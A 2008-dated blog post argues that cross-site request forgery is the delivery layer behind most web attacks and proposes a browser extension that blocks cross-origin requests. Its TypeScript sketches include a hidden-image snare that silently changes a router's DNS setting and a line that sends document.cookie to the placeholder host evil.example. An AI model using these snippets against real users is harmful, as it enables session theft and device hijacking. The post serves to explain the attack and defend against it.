The Snare of Unauthorized Requests
April 21, 2008 – 8:02 AM
Almost everyone knows what CSRF, or better, unauthorized requests, are. I never really embraced CSRF as the correct term for unauthorized request issues, because the term is outdated and inadequate for contemporary hacking. To me, an unauthorized request is the automation layer of a hacking procedure: it works without direct interference from the attacker. I usually illustrate this by comparing unauthorized requests to a trap, or snare, of the kind used by survivalists and hunters. It is automated to catch, and the victim triggers his own capture because of that automation. There isn't much skill involved; it is easy to set up. The only thing an attacker needs to do is wait.
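To make the snare metaphor concrete, here is a minimal sketch. It assumes a hypothetical device admin interface that changes state over a plain GET request; the URL and function name are illustrative, not taken from any real product. The attacker plants the markup and waits; the victim's browser springs the trap on page load.

```typescript
// Hypothetical snare: wrap a state-changing GET URL in an invisible image.
// When the victim merely views the page, the browser fires the request
// automatically, with the victim's session cookies attached.
function buildSnare(targetUrl: string): string {
  return `<img src="${targetUrl}" width="1" height="1" alt="">`;
}

// Example (hypothetical router admin URL):
const snare = buildSnare("http://192.168.1.1/admin?dns=6.6.6.6");
```

The attacker does nothing further; the automation does the catching, which is exactly what makes the snare comparison apt.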
Most vulnerabilities come down to unauthorized requests being made. Almost all cross-site scripting attacks are only useful when an unauthorized request is made: in order to do something more useful than printing alert boxes, attackers need to make remote, non-same-origin requests, such as logging cookies, phoning home, or fetching a worm. SQL injection can also be delivered through unauthorized requests, since the injection often travels in a verbatim GET request. When I am very strict, I'll even say that SQL injection is request abuse of the programming layer; in that case the software itself is the victim of the unauthorized request. Even many vulnerabilities designed to exploit browsers sometimes rely on unauthorized requests within the browser's architecture, like calling system functions or browser internals that should not be exposed in a secure browser.
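The cookie-logging case can be sketched in a few lines. The attacker host name here is an assumption for illustration; the point is that the injected script's only real work is constructing a cross-origin URL and letting the browser make the unauthorized request.

```typescript
// Build the cross-origin URL that smuggles the stolen cookie out as a
// query parameter. The host "evil.example" is a placeholder.
function buildExfiltrationUrl(attackerHost: string, cookie: string): string {
  return `http://${attackerHost}/log?c=${encodeURIComponent(cookie)}`;
}

// Inside an injected script, one line is enough to fire the request:
//   new Image().src = buildExfiltrationUrl("evil.example", document.cookie);
```

Note that the XSS flaw itself is only the entry point; without the cross-origin request at the end, the stolen data never leaves the victim's browser.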
So CSRF, or unauthorized requests, are multi-dimensional and can appear anywhere. It is very important to understand that they are only a distribution layer for the actual payload, whether that is session stealing, cookie stealing, or a completely automated reconfiguration of your router. The attack is automated rather than directly targeted, as most network attacks are. With this in mind, I like to stress the importance of the distribution layer rather than its payload: without distribution the payload cannot be transported, so for an attack to succeed the distribution layer must be flawed. Preventing unauthorized requests should be the focus of web application security. We can keep inventing new rules, signatures, and vectors, but as we have all learned, that is an arms race which is very difficult to win, and it will not stop unknown attacks yet to be invented.
TCP/IP and browsers.
I hear you: it will break features. Screw the features, that is an excuse. There isn't anything I cannot build on a website without requesting third-party information. So what is the solution? I gave it a lot of thought, and I came to the conclusion that it is up to the browser vendors to enforce content policies. I am not sure how far their efforts are in this area, and since I do not want to wait, I have announced that I am building an extension for Firefox that enforces content restrictions, or better: blocks all requests that go beyond the same-origin scope. If successful, the only attacks that remain are those performed within the same origin. Those cannot be stopped, but again, when you want to do something interesting you still need to make requests beyond the same origin to store or log the stolen data. So it leaves us only with low-level attacks, and notably phishing, which isn't a security issue but a user-education issue.
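The core policy check such an extension would have to perform can be sketched very simply. The function names are mine, not the extension's API; this is only the decision logic, assuming requests are compared by scheme and host.

```typescript
// Same-origin test: a request is allowed only if its scheme and host
// (including port) match those of the page that issued it.
function sameOrigin(pageUrl: string, requestUrl: string): boolean {
  const page = new URL(pageUrl);
  const req = new URL(requestUrl);
  return page.protocol === req.protocol && page.host === req.host;
}

// Policy: block everything that is not same-origin.
function shouldBlock(pageUrl: string, requestUrl: string): boolean {
  return !sameOrigin(pageUrl, requestUrl);
}
```

Under this policy the cookie-logging and snare examples above die at the distribution layer: the page may still be injected, but the outbound cross-origin request is never made.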
There are few drawbacks, actually; a machine must do what I tell it to, not the other way around. So stopping unauthorized requests at their roots is the bare minimum to me.